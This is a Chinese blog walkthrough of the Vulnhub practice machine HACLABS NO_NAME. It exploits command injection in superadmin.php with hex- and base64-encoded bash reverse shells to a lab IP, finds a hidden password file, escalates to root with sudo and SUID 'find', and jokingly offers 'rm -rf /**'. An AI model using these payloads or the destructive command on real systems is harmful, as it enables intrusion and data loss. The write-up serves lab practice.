【Vulnhub】靶机HACLAS-NO-NAME

admin 2022年1月10日03:34:00安全博客评论13 views1161字阅读3分52秒阅读模式

前言

  • Vulnhub刷题简单记录

NO_NAME

描述

这是一台初学者级别的机器,获得外壳有点困难,只要想开箱即用即可获得外壳。一旦获得外壳,权限提升就很容易。

这台机器有3个标志。每个标志都存在于特定用户的主目录中。准备好测试您的 Linux 技能。

初级/中级

NO_NAME开始

1、可以用两种方法确认靶场的存在,扫ip

1
2
netdiscover -i eth0 -r 192.168.56.0/24
nmap -sn 192.168.56.0/24

2、扫目标端口开发情况

1
2
nmap -sV -sC 192.168.56.109 -oA R
./nmapAutomator.sh -H 192.168.56.109 -t recon

3、访问主页,爆破目录,指定扫描php,这里用最大的字典,发现了superadmin.php

1
gobuster dir -u http://192.168.56.109 -w /usr/share/wordlists/dirb/big.txt -t 100 -x php

4、在此目录发现了命令执行漏洞,通过cat查看源代码,发现过滤了一些字符,这里给出两种方法解决

1
|| cat superadmin.php

image-20210926135855048

方法一

①、首先将我们的反弹代码转换为16进制

image-20210926135956216

②、利用xxd将其转换为ascii码字符,然后通过bash执行反弹成功,payload

1
echo "62617368202d6920263e2f6465762f7463702f3139322e3136382e35362e312f3132333420303e2631"|xxd -r -p|bash

方法二

①、将其转换为base64

1
||echo "YmFzaCAtaSAmPi9kZXYvdGNwLzE5Mi4xNjguNTYuMS8xMjM0IDA+JjEK" |base64 -d|bash

拿到shell之后,在home目录中找到yash的flag,提示说有一个隐藏文件

image-20210926142259849

这里我们就用find来寻找yash用户创建的文件,里面藏有密码

1
find / -name "*pass*" -type f -user yash 2>/dev/null

找到了/usr/share/hidden/.passwd目录,发现了另一个用户的密码

1
haclabs:haclabs1234

5、提权,接着发现可以无密码执行find

image-20210926142643706

简单的find提权

1
sudo find -exec /bin/bash \;

image-20210926143359326

提权方式二suid

1
find / -perm -u=s -type f 2>/dev/null

直接用下面命令,记得要加-p才能成功,或者直接反弹shell也行

1
find sky -exec /bin/bash -p \;

你如果闲的蛋疼也可以删除所有东西

1
rm -rf /**

我的个人博客

孤桜懶契:http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:34:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【Vulnhub】靶机HACLAS-NO-NAME http://cn-sec.com/archives/730037.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: